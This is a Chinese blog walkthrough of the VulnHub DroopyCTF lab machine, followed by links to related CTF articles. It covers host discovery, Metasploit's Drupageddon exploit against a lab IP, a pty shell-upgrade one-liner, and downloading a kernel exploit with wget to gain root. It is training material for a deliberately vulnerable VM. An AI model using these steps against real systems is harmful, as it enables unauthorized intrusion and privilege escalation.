DROOPYCTF WALKTHROUGH

最新推荐文章于 2023-06-28 16:25:18 发布
最新推荐文章于 2023-06-28 16:25:18 发布
阅读量300 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41082546/article/details/99190817
版权

 

droopyCTF

https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm

CTF镜像合集:https://www.vulnhub.com/?page=18

参考:https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/

1.获取目标ip地址,并进行端口发现,目标只开启了80端口

netdiscover -i eth0 -r 192.168.88.1/24

访问web页面

Drupal 7 应该是一个类似于wordpress的一个开源的框架

searchsploit Drupal 7 搜索相关漏洞

使用 msf 利用 漏洞

use exploit/multi/http/drupal_drupageddon

set rhosts 192.168.88.200

exploit

利用注入漏洞上传payload 获得shell

搜索内核相关漏洞信息

使用 pty 获取完整性shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’

开启web,使用 wget 将 漏洞利用代码下载到目标机器

编译.c文件,执行漏洞利用程序,成功获得root权限。

Micr067
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Droopy v0.2 靶机渗透(drupal 7.3版本漏洞)
afei001
08-14 325
目录 练习环境 1.发现靶机,端口扫描 2.网站探测 3.尝试查找drupal7.3版本漏洞 4.尝试MSF的Drupal漏洞拿下shell 5.尝试内核漏洞提权 6.继续探测获取flag 总结 练习环境 攻击机:kali 靶机:Droopy: v0.2 下载地址:https://download.vulnhub.com/droopy/DroopyCTF.ova 1.发现靶机,端口扫描 root@kali:~# netdi...
Centos7搭建Facebook CTF平台(二)(配置加速镜像)
ChenZIDu的博客
12-13 757
要理解docker,最核心的是理解三个概念,分别是:仓库(Registry)、镜像(image)和容器(Container)。 仓库(Registry) 所谓仓库,其实是个镜像仓库,里面有很多别人已经打包好的镜像,可以直接使用docker pull命令将仓库中的镜像拉到本地,默认的仓库Docker的官方仓库Docker Hub Registry。 因为墙的缘故,官方仓库的速度会比较慢,可以配一个官...
mrRobot CTF Walkthrough Writeup
qq_23026851的博客
01-17 648
OVA:https://www.vulnhub.com/entry/mr-robot-1,151/   用netdiscover 发现目标机的IP:192.168.164.164。   用浏览器上去逛一逛。   同时用nikto 扫描该主机。 发现它还使用wordpress。   访问/robots.txt 得到Key_1和一个字典。  ...
DroppyCtf靶机
小小猪的博客
06-10 327
DroppyCtf靶机 概述: 目标:getflag 下载链接:https://www.vulnhub.com/entry/droopy-v02,143/ 工具:kail linux 1.arp-scan -l 扫描靶机地址 2.nmap -sV -Pn -A x.x.x.234,扫描出80端口 访问80端口,弱口令不成功 nikto -h x.x.x.234 发现robots.txt文件 访问robots.txt文件,发现一下文件 访问/CHANGELOG....
docker使用镜像lamp创建自己的ctf平台(一)
xiao白帽子学习之路
01-11 2526
使用docker安装lamp,搭建ctf平台。 docker环境:vm的centos7。 大体步骤: 1.下载lamp镜像。 2.运行配置lamp容器。 3.测试ctf平台是否搭建成功。 一:下载lamp镜像 。 ①:修改docker源(国内某种原因,导致docker的pull镜像缓慢,emmm,非常缓慢) 修改/etc/docker/daemon.json文件 并添加上registry-mirr...
Walkthrough-App
05-03
"Walkthrough-App" 是一个Android应用程序,设计用于引导用户进行一系列操作,收集他们的输入数据,并将这些数据安全地存储在应用的领域数据库中。这个应用程序可能是为了教学、调研或者其他需要记录用户行为或反馈...
nodeschool-walkthrough
05-15
【标题】"nodeschool-walkthrough" 是一个与Node.js学习相关的项目,它是一个实践性的教程集合,旨在帮助用户通过nodeschool.io平台深入理解和掌握JavaScript和Node.js的基础知识。这个项目是一个存储了用户(哈里)...
blockchain-walkthrough
05-04
区块链演练“ Python教程:用不到60行代码构建区块链”中介绍了此代码。
cypress_walkthrough
04-24
赛普拉斯演讲演练中使用的预先构建的todos应用程序。
Django-Walkthrough
05-14
欢迎DFife99, 这是Gitpod的代码学院学生模板。 我们已经预装了您入门所需的所有工具。 您可以安全地删除此README.md文件,或为您自己的项目进行更改。 不过,请至少阅读一次! 它包含有关Gitpod和我们使用的扩展的...
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
ctf出题--docker镜像制作
最新发布
q1415500189的博客
06-28 602
ctf出题docker镜像制作
docker搭建简单的ctf题目
网络安全。
12-07 1万+
0x01 docker常用命令 1.拉取镜像。 docker pull [image] 2.查看docker当前镜像。 docker image ls 或 docker images 3.新建一个docker容器,并映射端口号。 docker run -d -p [host port]:[docker port] [image] 4.查看运行中的docker容器。 docker ps...
夺旗赛 CTF 六大方向基础工具简介集合(MISC,WEB,Crypto,Reverse,Pwn,Mobile)
热门推荐
小哈里的博客
01-14 2万+
1、MISC方向 杂项往往是不能被归到其他类别里的题目,所以什么样的题都有,工具也很杂。 主要的分类有: 1、视频音频图片类 Stegsolve.jar 一款图像隐写工具,支持使用不同方式解除图像隐写,是图像隐写的必备工具。可以破解色道隐写等,需要JAVA环境。 QR_Research.exe 用于扫描二维码,有些题目需要自己准备二维码定位角图用p图工具p上去 Audacity.exe 运行于windows的常用音频隐写工具 outguess(linux) 开源隐写算法,支持各种格式的文件,C语言编写 M
手把手教你如何建立一个支持ctf动态独立靶机的靶场(ctfd+ctfd-whale)
fjh1997的博客
09-15 2万+
手把手教你如何建立一个支持ctf动态独立靶机的靶场 前言 要说开源的ctf训练平台,ctfd是不错的选择,支持各种插件,今天我就来介绍一下如何部署赵今师傅为ctfd平台写的一款支持独立动态靶机的插件。 动态独立靶机 说到独立动态靶机,各位ctfer可能会联想到i春秋举办的各类比赛,其中比赛环境大都用到了动态独立靶机(dynamic standalone instance)技术,也就是每做一道题,就...
靶机-BTRSys 2.1 Walkthrough
banacyo14206的博客
08-22 662
BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 参考:https://www.jianshu.com/p/9813095ce04d 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linuxprivc...
docker搭建ctf环境
scrawman的博客
11-07 1652
记录一下docker搭建ctf环境和dockerfile的使用 我是在kali里搭建的docker,只需要命令sudo apt install docker.io一秒安装 systemctl start docker启动docker服务 如果你只有题目的源码可以参考这篇https://blog.csdn.net/lhh134/article/details/84873821用docker搭建环境 在pull的那一步可能会出现下载速度慢的情况,可以换源。/etc/docker下找daemon.json文件,没
『VulnHub系列』WTF: 1-Walkthrough
ins1ght的博客
12-14 1662
这是个人完成的第27个VulnHub上的靶机。靶机发布日期:2019年11月22日,难度:中等。 标签:MiTM、/usr/bin/pip提权
VulnHub靶机实战教程:全面解析与 Walkthrough
教程内容包括多个VulnHub靶机的walkthrough,如AI:Web:2、bossplayersCTF:1、Bottleneck:1、DC系列等,覆盖了多种攻防技术。" 正文: VulnHub是一个在线平台,提供了各种虚拟环境,用于模拟真实世界的网络安全漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Micr067

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值